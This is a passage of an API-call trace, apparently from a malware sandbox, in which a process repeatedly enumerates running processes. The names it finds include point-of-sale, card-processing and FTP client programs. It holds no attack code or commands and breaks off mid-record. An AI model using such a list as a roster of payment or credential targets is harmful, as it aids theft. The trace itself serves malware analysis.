[0278.996] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0278.998] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0279.003] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0279.005] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0279.007] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0279.008] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0279.010] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0279.017] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0279.019] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0279.020] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0279.022] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0279.024] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0279.036] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0279.039] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0279.041] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0279.047] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0279.049] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0279.051] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0279.053] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0279.055] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0279.068] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0279.070] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0279.072] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0279.077] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0279.079] CloseHandle (hObject=0x1d14) returned 1 [0279.079] Sleep (dwMilliseconds=0x64) [0279.202] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x21f8 [0279.251] Process32First (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0279.253] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0279.255] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0279.256] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0279.258] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0279.260] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0279.266] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0279.269] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0279.271] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0279.273] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.275] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.496] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0279.498] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.500] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.501] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.503] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.504] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.506] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.507] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.509] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0279.512] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0279.513] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0279.515] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.516] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0279.518] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0279.519] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0279.521] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0279.522] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0279.524] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0279.525] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0279.527] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0279.622] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0279.623] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0279.625] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0279.626] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0279.628] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0279.629] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0279.631] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0279.632] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0279.634] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0279.635] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0279.714] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0279.717] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0279.719] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0279.720] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0279.722] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0279.724] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0279.726] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0279.728] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0279.964] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0279.967] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0279.969] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0279.970] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0279.972] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0279.974] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0279.976] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0279.978] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0279.980] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0279.982] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0279.983] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, 